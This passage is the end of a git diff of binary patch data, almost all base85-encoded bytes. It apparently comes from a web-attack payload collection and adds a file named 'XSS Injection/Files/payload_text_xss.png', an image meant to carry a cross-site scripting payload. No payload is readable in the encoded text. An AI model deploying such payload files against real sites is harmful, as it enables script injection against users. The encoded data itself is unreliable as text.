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
WNweo%*E%ncsmV$zNfe2hJotY&6VhS;

literal 0
HcmV?d00001

diff --git a/XSS Injection/Files/payload_text_xss.png b/XSS Injection/Files/payload_text_xss.png
new file mode 100644
index 0000000000000000000000000000000000000000..45e17d51f989be2894e5d29af96aa5255fed5d70
GIT binary patch
literal 28082
zcmdRVRaYEL6XxIq4?%-NaCc{bV8K1OySoH;UOc$FOK`UU!QI`0+u#f^%&_@(f5l$3
zp1P>6)Ae*&|EH=fi;4Cb4FCXOev^|@|2Mw=Ye%T?|N2L)fG__BL~98p2>_rm5&g{+
z>ED{tTuxmH0Qf-%00f8sKl<QP0Kk(205~@R0E99D0794CE;W&Vw8&-(vQhv905SlZ
zX}&P--_8dYIbC-EfQ{yV4bG<w==E<C#p9cjG|B-60x~W<G2bN{0H9s`O-e%3XX6U0
zoA^aHn>IS{ew&%P+O8(&8uXD|VI=uyR$8lvmXZp8l<4Ab6An@*07Wz%>W%S@%FTa!
z2*#*lAHPtbx&Zk2aS(71Jyf*5dumy-W~C`e`A9wE_GN7r=Zy7&h5d1Ou@h07QCG)q
zJox!ValTBkvPwxyCmOwgz<JmHZ-npbK?(TU0wfKD0dUN<H{C-qAm&`E+S9&4;=%ua
zrhiWSeh@GKBp3?A0jf6)LG#XUERu!d!NI5>p%ruQcZz$0i`!NV`ZrWVAr8vM8SsOo
zwCdJJ1pOk>V_8~Olok_o|2=RId5So95%NgIsWXuGpo>L@`ir$Xwri0-c1O&mcFxD=
z6Qg~#^7#CFVv{hywVy`BxJ!ewd2F!SW$5cwWnOf4&O~hBwKY~s!w0}=SO%`9o#i0+
zIbne9|0N|s6S!9`1jukIkk?r;TAzM+T?l^ITR&yPBcl8f!?3RH@h(QGX-3yIarKDV
z<2}sZ1))i7<`B`KI#7TQ2^Z4p|FH(O;`$t=6#gjB_yb(be&rp0(xdhG85vF!b^8zq
zJ&UJ6texE?E$%3WTz@8)WZN03>+i^W=YQYbG&IOz#tT1D49!5D1?S0B&{&|8$rdDT
